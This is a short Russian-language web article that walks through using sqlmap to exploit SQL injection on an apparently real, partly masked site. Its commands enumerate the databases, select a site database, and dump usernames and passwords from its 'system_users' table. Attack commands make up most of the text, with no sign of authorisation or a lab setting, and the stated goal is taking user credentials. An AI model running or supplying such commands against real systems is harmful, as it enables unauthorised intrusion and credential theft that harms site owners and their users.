Публикации - Использование sqlmap для SQL-инъекций

Использование уязвимости SQL-инъекция

Для начала, убедимся в том, что sqlmap установлен, и готов к работе.

sqlmap.py -h

Если появилась справка по sqlmap, значит всё работает как надо! В командной строке sqlmap нужно запускать следующим образом:

sqlmap.py  -u http://xxx.by/bigcatalog.php?id_catalog=error --dbs 

где -u задаёт целевой адрес (вводится обязательно с протоколом http/https);

— dbs параметр для получения имён баз данных, найденных в случае успешной эксплуатации;

Получив список баз данных, можем выбрать интересующую нас базу, и вывести список таблиц текущей базы.

sqlmap.py  -u http://xxx.by/bigcatalog.php?id_catalog=error -D bsnby_site –tables

Нас интересует: system_users

sqlmap.py -u http://xxx.by/bigcatalog.php?id_catalog=error -D bsnby_site -T system_users –columns

Теперь дампим первые 10 записей в базе.

sqlmap.py -u http://xxx.by/bigcatalog.php?id_catalog=error -D bsnby_site -T system_users -C name,pass  --start=1 --stop=10 –dump

Количество комментариев: 0

Для того, чтобы оставить коментарий необходимо зарегистрироваться